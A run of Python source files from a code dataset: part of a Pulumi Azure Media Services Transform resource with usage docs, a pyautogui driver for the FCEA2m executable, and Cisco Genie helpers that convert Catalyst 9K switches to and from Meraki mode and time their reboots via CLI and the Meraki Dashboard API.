storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
id=example_account.id,
is_primary=True,
)])
example_transform = azure.media.Transform("exampleTransform",
resource_group_name=example_resource_group.name,
media_services_account_name=example_service_account.name,
description="My transform description",
outputs=[azure.media.TransformOutputArgs(
relative_priority="Normal",
on_error_action="ContinueJob",
builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
preset_name="AACGoodQualityAudio",
),
)])
```
### With Multiple Outputs
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS")
example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
id=example_account.id,
is_primary=True,
)])
example_transform = azure.media.Transform("exampleTransform",
resource_group_name=example_resource_group.name,
media_services_account_name=example_service_account.name,
description="My transform description",
outputs=[
azure.media.TransformOutputArgs(
relative_priority="Normal",
on_error_action="ContinueJob",
builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
preset_name="AACGoodQualityAudio",
),
),
azure.media.TransformOutputArgs(
relative_priority="Low",
on_error_action="ContinueJob",
audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
audio_language="en-US",
audio_analysis_mode="Basic",
),
),
azure.media.TransformOutputArgs(
relative_priority="Low",
on_error_action="StopProcessingJob",
face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
analysis_resolution="StandardDefinition",
),
),
])
```
## Import
Transforms can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional verbose description of the Transform.
:param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
:param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TransformArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Transform.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS")
example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
id=example_account.id,
is_primary=True,
)])
example_transform = azure.media.Transform("exampleTransform",
resource_group_name=example_resource_group.name,
media_services_account_name=example_service_account.name,
description="My transform description",
outputs=[azure.media.TransformOutputArgs(
relative_priority="Normal",
on_error_action="ContinueJob",
builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
preset_name="AACGoodQualityAudio",
),
)])
```
### With Multiple Outputs
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS")
example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
id=example_account.id,
is_primary=True,
)])
example_transform = azure.media.Transform("exampleTransform",
resource_group_name=example_resource_group.name,
media_services_account_name=example_service_account.name,
description="My transform description",
outputs=[
azure.media.TransformOutputArgs(
relative_priority="Normal",
on_error_action="ContinueJob",
builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
preset_name="AACGoodQualityAudio",
),
),
azure.media.TransformOutputArgs(
relative_priority="Low",
on_error_action="ContinueJob",
audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
audio_language="en-US",
audio_analysis_mode="Basic",
),
),
azure.media.TransformOutputArgs(
relative_priority="Low",
on_error_action="StopProcessingJob",
face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
analysis_resolution="StandardDefinition",
),
),
])
```
## Import
Transforms can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
```
:param str resource_name: The name of the resource.
:param TransformArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
media_services_account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TransformArgs.__new__(TransformArgs)
__props__.__dict__["description"] = description
if media_services_account_name is None and not opts.urn:
raise TypeError("Missing required property 'media_services_account_name'")
__props__.__dict__["media_services_account_name"] = media_services_account_name
__props__.__dict__["name"] = name
__props__.__dict__["outputs"] = outputs
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
super(Transform, __self__).__init__(
'azure:media/transform:Transform',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
media_services_account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform':
"""
Get an existing Transform resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional verbose description of the Transform.
:param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
:param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TransformState.__new__(_TransformState)
__props__.__dict__["description"] = description
__props__.__dict__["media_services_account_name"] = media_services_account_name
__props__.__dict__["name"] = name
__props__.__dict__["outputs"] = outputs
__props__.__dict__["resource_group_name"] = resource_group_name
return Transform(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional verbose description of the Transform.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="mediaServicesAccountName")
def media_services_account_name(self) -> pulumi.Output[str]:
"""
The Media Services account name. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "media_services_account_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Transform. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]:
"""
One or more `output` blocks as defined below. At least one `output` must be defined.
"""
return pulumi.get(self, "outputs")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "resource_group_name")
| StarcoderdataPython |
3368907 | # Driver for running the FCEA2m executable
# <NAME>, Project Caelus, 12/14/2019
import os
import sys
import time
import subprocess
import threading
import pyautogui
def type_with_delay(dir_name: str, delay: int or float):
time.sleep(delay)
pyautogui.typewrite(dir_name)
pyautogui.press("enter")
if __name__ == "__main__":
print("Please enter the path to (and inluding) the .inp file. Current directory: {}".format(os.getcwd()))
dir_name = input("Example: \"ethanol-95-n2o/ethanol-95-n2o.inp\": ")
while os.path.exists(dir_name) == False:
if dir_name == "0":
sys.exit(0)
print("Path invalid. Please try again. Current directory: {}".format(os.getcwd()))
dir_name = input("Please enter the path to (and including) the .inp file (enter 0 to exit): ")
dot_index = dir_name.index(".")
dir_name = dir_name[:dot_index]
print(dir_name)
t1 = threading.Thread(target=type_with_delay, args=(dir_name, 0.25), daemon=True)
t1.start()
subprocess.call(["FCEA2m.exe"])
t1.join()
slash_instances = [index for index, val in enumerate(dir_name) if val == "/" or "\\"]
print("Operation complete. {}.out saved to {}.out".format(dir_name[max(slash_instances)+1:], dir_name))
| StarcoderdataPython |
3318568 | <filename>pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/meraki/configure.py
'''IOSXE configure functions for meraki'''
# Python
import re
import time
# Genie
from genie.utils.timeout import Timeout
# Banner
from pyats.log.utils import banner
# Logger
import logging
log = logging.getLogger(__name__)
# Unicon
from unicon import Connection
from unicon.core.errors import (
SubCommandFailure,
TimeoutError,
ConnectionError,
)
from unicon.eal.dialogs import Statement, Dialog
def configure_meraki_register(device, token, mac_address):
"""
This method is used to register the device to meraki dashboard
It uses token, mac-address
Args:
device ("obj"): Device object
token ("str"): Token used for registration eg: <PASSWORD>
mac_address: MAC Address of the device eg: 00:18:0a:00:58:ef
Raises:
Exception
Returns:
True if succeeded else False
"""
dialog = Dialog([
Statement(
pattern=r"Enter token for switch +(\d+):",
action="sendline({})".format(token),
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"Check if token is entered correctly? \[confirm\].*",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"Enter Mac addr or just Return to use switch's Base Mac Addr. Enter Mac Addr for switch +(\d+) in hh:hh:hh:hh:hh:hh:",
action="sendline({})".format(mac_address),
loop_continue=True,
continue_timer=False,
),
Statement(pattern=r"Check if mac address is entered correctly? \[confirm\].*",
action='sendline()',
loop_continue=False,
continue_timer=False
),
Statement(pattern=r"Mac address is .*",
action='sendline()',
loop_continue=False,
continue_timer=False)
])
cmd = 'service meraki register token {}'.format(token)
try:
device.execute(cmd, reply=dialog)
except Exception as err:
log.error("Failed to register the device correctly: {err}".format(err=err))
raise Exception(err)
def configure_conversion_reversion(device, via_console, mode='conversion', reload_timeout=5000,
username=None,
password=None,
reload_hostname='Switch',
m_user="miles",
m_pwd="<PASSWORD>",
m_enable="<PASSWORD>",
reload_creds=None,
device_online_status_timeout=1000,
retry=30,
interval=10,
api_key='0',
serial='0',
organization_id='0'):
"""
This method verifies if the device is ready for conversion from CAT9K Classic mode
to Meraki Mode.
It verifies the device is ready by using 'show meraki' command.
Once the device is ready, it execute 'service meraki start'
which will reload the device and come up in Meraki mode.
This will also calculates the time taken to connect to the dashboard.
Args:
device ("obj"): Device object
via_console(`str`): Via to use to reach the device console.
mode ("str"): Type of mode to be executed : 'conversion' or 'reversion'
reload_timeout ("int"): How long to wait after the reload starts
username ("str"): Username after conversion
password ("<PASSWORD>"): <PASSWORD> conversion
reload_hostname ("str"): reload_hostname after conversion will be 'Switch'
m_user ("str"): Meraki Default Username
m_pwd ("str"): Meraki Default Password
m_enable ("str"): Meraki Default Enable Password
reload_creds ("str"): Reload Credentials like device, hostname etc..
device_online_status_timeout ("int"): Retry secs for the device to come online after conversion
retry ("int"): Number of retries to be handled to check the device state
interval ("int"): Sleep time between the retries
api_key ('str"): API Key to connect to the dashboard
serial ("str"): Serial / Token number of the device used to connect to dashboard
organization_id ("str"): Org Id where the device is connected in dashboard
Raises:
Exception
Returns:
True if succeeded else False
"""
if mode == 'conversion':
mode_check = 'C9K-C'
dialog = Dialog([
Statement(
pattern=r"Proceeding with conversion will permanently erase all data "
r"and the device can only be managed by Cisco Meraki dashboard. "
r"Continue\? \[Y\/N\]\[confirm\].*",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"Continue \[Y\/N\]\[confirm\].*",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(pattern=r"^.*RETURN to get started",
action='sendline()',
loop_continue=False,
continue_timer=False)
])
log.info('Verify if the device is ready for conversion')
else:
mode_check = 'C9K-M'
dialog = Dialog([
Statement(
pattern=r"proceeding with conversion is destructive to the current IOS configuration "
r"and will render the device to regular Cat9K "
r"Continue? \[confirm\].*",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Enter host name \[Switch\]\:",
action="sendline()", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Enter enable secret\: ",
action="sendline(Meraki12345)", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Confirm enable secret\: ",
action="sendline(Meraki12345)", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Enter enable password\:",
action="sendline(Meraki12345)", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Enter virtual terminal password\:",
action="sendline(Meraki12345)", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Community string \[public\]\:",
action="sendline()", # Temp password will be removed later
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*management network from the above interface summary\:",
action="sendline(GigabitEthernet0/0)",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*IP address for this interface \[+\S+\]\:",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Subnet mask for this interface \[+\S+\] \:",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*Enter your selection \[2\]\:",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(
pattern=r"^.*OK to enter CLI now\.\.\.",
action="sendline()",
loop_continue=True,
continue_timer=False,
),
Statement(pattern=r"^.*RETURN to get started",
action='sendline()',
loop_continue=False,
continue_timer=False)
])
log.info('Verify if the device is ready for reversion')
os = device.os
hostname = device.name
ip = str(device.connections[via_console]["ip"])
port = str(device.connections[via_console]["port"])
# Execute 'show meraki' and check the status of registration and the mode.
# Switch#show meraki
# Switch Serial Conversion
# Num PID Number Meraki SN Mac Address Status Mode
# 5 C9300-24T FJC2328U02M Q2ZZ-8FAF-954B 0018.0a00.50b7 Registered C9K-C
cmd = 'show meraki'
output = device.parse(cmd)
if output is not None:
for sw in output['meraki']['switch']:
current_mode = output['meraki']['switch'][sw]['current_mode']
conversion_status = output['meraki']['switch'][sw]['conversion_status']
if current_mode != mode_check:
log.error("Device is not ready, device is NOT in '{}' "
"mode".format(mode_check))
return False
if mode == 'conversion':
if conversion_status != 'Registered':
log.error("Device is not ready, device is NOT Registered")
return False
log.info('Device is ready for Conversion from C9K - '
'Classic Mode to C9K - Meraki Mode')
# Start the Conversion or Reversion according to the
# mode specified by the user.
log.info('Recording the time before the Conversion/Reversion')
T00 = device.parse('show clock')
log.info('@@#@ T00 is {}'.format(T00))
conv_start_time = time.time()
if mode == 'conversion':
log.info('Execute service meraki start command')
cmd = 'service meraki start'
else:
log.info('Execute service meraki stop command')
cmd = 'service meraki stop'
try:
device.execute(cmd, reply=dialog, timeout=reload_timeout)
device.disconnect()
except SubCommandFailure:
# Disconnect and destroy the connection
log.info(
"Successfully executed {} command on device {}".format(
device.name, cmd
)
)
log.info(
"Disconnecting and destroying handle to device {}".format(
device.name
)
)
device.disconnect()
device.destroy()
except Exception as e:
raise Exception(
"Error while reloading device '{}'".format(device.name)
) from e
# Reconnect to device which will be in Meraki Mode after
# conversion or in Classic mode after reversion
log.info(
"\n\nReconnecting to device '{}' after conversion/reversion "
"and reload...".format(hostname)
)
# Device coming up in Meraki mode has the below default startup config applied
# Uses the default static Username "miles" and Password "<PASSWORD>" to connect to the script after conversion
new_device = Connection(
credentials=dict(default=dict(username=m_user, password=<PASSWORD>),
enable=dict(password=<PASSWORD>)),
os=os,
hostname=reload_hostname,
start=["telnet {ip} {port}".format(ip=ip, port=port)],
prompt_recovery=True,
)
# Try to reconnect with iteration
device_connected = 0
for i in range(int(retry)):
if device_connected:
break
con = new_device.connect()
if 'Connected to' in con:
log.info('Recording the time After the Conversion/Reversion')
device_prompt_time = time.time()
device_connected = 1
else:
time.sleep(interval)
if i == int(retry) - 1:
log.error('Retry connection failed')
new_device.disconnect() # Disconnect anyways before return
return False
log.info(
"Successfully reconnected to device '{}' after 'Conversion/Reversion' "
"and reload'".format(hostname)
)
new_device.configure('no enable password') # Remove the temp password created
new_device.configure('username {} privilege 15 password {}'
.format(username, password)) # Configure the original username and password
new_device.execute('wr mem') # Save the Config before disconnecting.
new_device.disconnect() # Disconnect the device
if mode == 'conversion':
log.info('Device from C9K-C to C9K-M Conversion happened Successfully')
status_state = 'online'
else:
log.info('Device from C9K-M to C9K-C Reversion happened Successfully')
status_state = 'offline'
# Check the dashboard to find the status of the device
if serial != '0' and api_key != '0' and organization_id != '0':
try:
import meraki # import meraki api
except Exception:
log.error("Couldn't import Meraki will skip running this api")
return True
log.info('Connect to the Dashboard')
dashboard = meraki.DashboardAPI(api_key)
# Check the device status, retry until it comes online
log.info('Check the device status, retry until it comes to the desired state')
device_online = 0
for i in range(int(device_online_status_timeout)):
if device_online:
break
response = dashboard.organizations.getOrganizationDevicesStatuses \
(organization_id, total_pages='all')
for dev in response:
if dev['serial'] == serial:
log.info('DEVICE Status: {}'.format(dev))
if dev['status'] == status_state:
device_status_time = time.time()
log.info('Device Status: {}'.format(dev))
log.info('---------------------------------')
log.info("--- %s seconds ---" % (time.time() - device_status_time))
log.info('---------------------------------')
device_online = 1
if i == (int(device_online_status_timeout) - 1):
log.error('Device is not Online within {} secs after '
'Conversion: ABORT'.format(device_online_status_timeout))
return 0
else:
continue
log.info('CALCULATE THE TIME TAKEN FOR CONVERSION OR REVERSION')
log.info(banner('START TIME : {}'.format(conv_start_time)))
log.info(banner('END TIME : {}'.format(device_prompt_time)))
log.info(banner('DASHBOARD STATUS : {}'.format(device_status_time)))
conv_time = (int(device_prompt_time) - int(conv_start_time)) / 60
dev_online = (int(device_status_time) - int(device_prompt_time)) / 60
total_time = (int(device_status_time) - int(conv_start_time)) / 60
log.info(banner('CONVERSION TIME : {}'.format(conv_time)))
log.info(banner('DEV ONLINE/OFFLINE TIME : {}'.format(dev_online)))
log.info(banner('TOTAL TIME : {}'.format(total_time)))
return True
def _convert_seconds_to_minutes(seconds):
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
def _show_clock_seconds(device):
output = device.execute('show clock')
match_value = re.search('[0-9]+:[0-9]+:[0-9]+(\.[0-9]+)*', output)
current_time = match_value.group(0)
log.info('@@#@ time is %s' % time)
tmp = current_time.split(':')
current_time_in_sec = float(tmp[2]) + (float(tmp[1]) * 60) + (float(tmp[0]) * 60 * 60)
output = int(current_time_in_sec)
return output
def c9k_m_reload_with_boot_measurement(device, api_key, organization_id, serial, intf_name, reload_type='api',
routable_ip='192.168.1.1', timeout=1000, intfuptimeout=200):
"""
This method is for the reboot and boot time measurements.
This method has to 2 options for reboot one via Dashboard Meraki API and another via CLI
With this it measures the below steps
Step1: Time taken for the device to go offline after reload is given
Step2: Time taken for the device to come online after reload
Step3: Time taken for getting the boot prompt
Args:
device ("obj") : Device object
api_key : Dashboard API Key for connecting to Dashboard
organization_id : Organization Id where the device is claimed
serial : Serial Number/ Token of the Device
intf_name : Interface where the client is connected, used to verify the data after boot.
reload_type : Type of Reload via 'api' or via 'cli'
routable_ip : To Ping after the device is Up
timeout : Reload Timeout used at both CLI and API
intfuptimeout : Timeout Used for Interface to come up, used in CLI.
Raises:
Exception
Returns:
1 if succeeded else 0
"""
try:
import meraki # import meraki api
except Exception:
log.error('Couldnt import meraki will skip running this api')
return 0
log.info('Connect to the Dashboard')
dashboard = meraki.DashboardAPI(api_key)
log.info(banner('Check the status of the device'))
device_online = 0
for i in range(timeout):
if device_online:
break
response = dashboard.organizations.getOrganizationDevicesStatuses \
(organization_id, total_pages='all')
for dev in response:
if dev['serial'] == serial:
log.info('DEVICE Status: {}'.format(dev))
if dev['status'] == 'online':
device_online = 1
if i == (timeout - 1):
log.error('Device is not Online within {} secs after '
'reload: ABORT'.format(timeout))
return 0
else:
continue
log.info('Device is Online, continue with Reload')
log.info('Disconnect and Reconnect the device if there is a disconnect happens in previous runs.')
device.disconnect()
device.connect()
log.info('Recording the time before the reload')
T00 = device.parse('show clock')
log.info('@@#@ T00 is {}'.format(T00))
log.info(banner('Reloading the device'))
device.execute('wr mem')
if reload_type != 'api': # Reload using the Dashboard API
device.reload(timeout=timeout)
else:
# Reload the device using the API
log.info('---------------------------------')
log.info('Reload API Start time')
api_start_time = time.time()
log.info("--- %s seconds ---" % (time.time() - api_start_time))
log.info('---------------------------------')
response = dashboard.devices.rebootDevice(serial)
log.info('Status of the Reload API: {}'.format(response))
if response['success'] == True:
log.info('Reboot request sent to device successfully')
else:
log.error('API did not send the Reboot Successfully: Abort')
# Check the time taken for the device to go offline
log.info('############################################################')
log.info('Check the time taken for the device to go offline for reboot')
log.info('############################################################')
device_offline = 0
for i in range(timeout):
if device_offline:
break
response = dashboard.organizations.getOrganizationDevicesStatuses \
(organization_id, total_pages='all')
for dev in response:
if dev['serial'] == serial:
log.info(time.time())
if dev['status'] == 'offline':
device_offline_time = time.time()
log.info('Device Status: {}'.format(dev))
log.info('---------------------------------')
log.info("--- %s seconds ---" % (time.time() - device_offline_time))
log.info('---------------------------------')
device_offline = 1
if i == (timeout - 1):
log.error('Device has not gone Offline within {} secs after '
'reload sent from dashboard: ABORT'.format(timeout))
return 0
else:
continue
log.info('Wait for the device to come back online after reload')
log.info(banner('Check the time taken for the device to come Online after reboot'))
device_online = 0
for i in range(timeout):
if device_online:
break
response = dashboard.organizations.getOrganizationDevicesStatuses \
(organization_id, total_pages='all')
for dev in response:
if dev['serial'] == serial:
log.info('DEVICE Status: {}'.format(dev))
if dev['status'] == 'online':
device_online_time = time.time()
log.info('Device Status: {}'.format(dev))
log.info('---------------------------------')
log.info("--- %s seconds ---" % (time.time() - device_online_time))
log.info('---------------------------------')
device_online = 1
if i == (timeout - 1):
log.error('Device is not Online within {} secs after '
'reload: ABORT'.format(timeout))
return 0
else:
continue
log.info(banner('Check the time taken for the port to be connected after online'))
port_online = 0
for i in range(timeout):
if port_online:
break
response = dashboard.switch.getDeviceSwitchPortsStatuses(serial)
for dev in response:
if dev['portId'] == '12':
log.info('Port Status: {}'.format(dev))
if dev['status'] == 'Connected':
port_connected_time = time.time()
log.info('Port Connected Time: {}'.format(dev))
log.info('---------------------------------')
log.info("--- %s seconds ---" % (time.time() - port_connected_time))
log.info('---------------------------------')
port_online = 1
if i == (timeout - 1):
log.error('Port is not Online within {} secs after '
'reload: ABORT'.format(timeout))
return 0
else:
continue
log.info(banner('Time to get the prompt after reboot'))
prompt_time = time.time()
try:
device.disconnect()
device.connect()
except Exception:
log.error('Not able to reconnect after reload')
return 0
T01 = device.parse('show clock')
log.info('@@#@ T01 : Time to get prompt after reboot is {}'.format(T01))
device.execute("terminal length 0")
device.execute("terminal width 0")
log.info('IOS bootup time')
output = device.execute("show logg | in reboot")
boot_time = re.search('.*:\s+Time taken to reboot after reload =\s+(\d+)\s+seconds$', output)
boot_time_seconds = boot_time.group(1)
log.info('@@#@ boot_time_seconds is {}'.format(boot_time_seconds))
T0_sec = int(boot_time.group(1))
log.info('@@#@ T0_sec is {}'.format(T0_sec))
T0 = int(T0_sec / 60)
log.info('@@#@ Initial boot time (power up to switch prompt) T0 is {}'.format(T0))
log.info('---------------------------------')
log.info("--- %s minutes ---" % T0)
log.info('---------------------------------')
log.info('Recording the time after the reload')
T10_sec = _show_clock_seconds(device)
log.info('@@#@ T10_sec is {}'.format(T10_sec))
T10 = _convert_seconds_to_minutes(T10_sec)
log.info('@@#@ T10 is {}'.format(T10))
log.info('Disable Logging Console')
device.configure('no logging console')
log.info('Checking interface status')
# checking interface state in a loop of 1500 sec
timer = 0
int_state = 0
while int_state != 1 and timer <= intfuptimeout:
output = device.execute("show ip interface brief {} | in down".format(intf_name))
if not 'administratively' in output:
log.info('@@#@ PASS: Interface %s is changed from admin down to down ' % intf_name)
log.info('Time to bring-up interface')
T11_sec = _show_clock_seconds(device)
log.info('@@#@ T11_sec is {}'.format(T11_sec))
T11 = _convert_seconds_to_minutes(T11_sec)
log.info('@@#@ T11 is {}'.format(T11))
break
else:
log.info('@@#@ Interface %s is not changed from admin down to down and retry' % intf_name)
time.sleep(10)
timer += 1
output = device.execute("show ip interface brief {} | in down".format(intf_name))
if not 'administratively' in output:
log.info('@@#@ PASS: Interface %s is changed from admin down to down ' % intf_name)
else:
log.error("@@@@ FAIL: Interface %s is not changed from admin down to down after 1500sec" % intf_name)
device.execute("show ip int br | i up")
device.execute("show ip int br")
log.info('Checking ping and Mtunnel status')
device.transmit('app-hosting connect appid meraki session\r')
device.receive('/ #', timeout=2)
device.transmit('cat MERAKI_BUILD \r')
device.receive('/ #', timeout=2)
output = device.receive_buffer()
log.info('@@#@ MERAKI BUILD is: %s' % output)
device.transmit('cat /IOS_XE_BUILD \r')
device.receive('/ #', timeout=2)
output = device.receive_buffer()
log.info('@@#@ IOS_XE_BUILD is: %s' % output)
# checking ping status in a loop of 900 sec
timer = 0
ping_status = 0
while ping_status != 1 and timer <= 90:
device.transmit('ping -c 1 %s\r' % routable_ip)
# device.receive('/ #',timeout = 20)
device.receive(r'^.*packets received.*')
output = device.receive_buffer()
time.sleep(10)
log.info('@@#@ Ping output is {}'.format(output))
# import pdb;pdb.set_trace()
if '1 packets received' in output:
log.info('@@#@ Ping to %s passed' % routable_ip)
device.transmit('dohost "show clock" > /storage/time\r')
device.receive('/ #', timeout=2)
device.transmit('more /storage/time\r')
device.receive('/ #', timeout=2)
T112 = device.receive_buffer()
time.sleep(10)
log.info('@@#@ Testing T112 is {}'.format(T112))
break
else:
log.info('@@#@ Ping to %s failed and retry' % routable_ip)
time.sleep(10)
timer += 1
device.transmit('ping -c 1 %s\r' % routable_ip)
device.receive(r'^.*packets received.*')
output = device.receive_buffer()
time.sleep(10)
log.info('@@#@ Ping output is {}'.format(output))
if '1 packets received' in output:
log.info('@@#@ Ping to %s passed' % routable_ip)
else:
log.error("@@@@ FAIL: Ping is failed after 15 minutes once the interface state is changed ")
device.transmit('cat /tmp/connection_state\r')
device.receive('/ #', timeout=2)
output = device.receive_buffer()
device.transmit('cat /click/ios/dump_pending_config_reqs\r')
device.receive('/ #', timeout=5)
output = device.receive_buffer()
device.transmit('cat /click/uplinkstate/dhcp_state\r')
device.receive('/ #', timeout=5)
device.transmit('head -3 /click/uplinkstate/dhcp_state\r')
device.receive('/ #', timeout=5)
output = device.receive_buffer()
device.transmit('cat /click/mtun/server1/state/debug_dump\r')
device.receive('/ #', timeout=5)
output = device.receive_buffer()
device.transmit('cat /click/mtun/server2/state/debug_dump\r')
device.receive('/ #', timeout=5)
output = device.receive_buffer()
device.transmit('cat /click/mtun/server3/state/debug_dump\r')
device.receive('/ #', timeout=5)
output = device.receive_buffer()
device.transmit('exit\r')
device.receive('#', timeout=2)
device.transmit('\r')
output = device.execute('more flash:/meraki/storage/time')
match_value = re.search('[0-9]+:[0-9]+:[0-9]+(\.[0-9]+)*', output)
current_time = match_value.group(0)
log.info('@@#@ time is %s' % current_time)
# return current_time
tmp = current_time.split(':')
current_time_in_sec = float(tmp[2]) + (float(tmp[1]) * 60) + (float(tmp[0]) * 60 * 60)
T12_sec = int(current_time_in_sec)
# return output
log.info('@@#@ T12_sec is {}'.format(T12_sec))
T12 = _convert_seconds_to_minutes(T12_sec)
log.info('@@#@ T12 is {}'.format(T12))
log.info('Collecting DMI and NDB Logs')
device.execute('show logging process dmiauthd internal start last boot to-file flash:dmiauthd')
device.execute('show logging process ndbmand internal start last boot to-file flash:ndbmand')
log.info('Printing the performance numbers')
log.info(banner('@@#@ T00 is {}'.format(T00)))
log.info(banner('@@#@ T0 is {}'.format(T0)))
log.info(banner('@@#@ T10 is {}'.format(T10)))
log.info(banner('@@#@ T11 is {}'.format(T11)))
log.info(banner('@@#@ T12 is {}'.format(T12)))
T1_sec = T11_sec - T10_sec
T2_sec = T12_sec - T11_sec
T3_sec = T0_sec + T1_sec + T2_sec
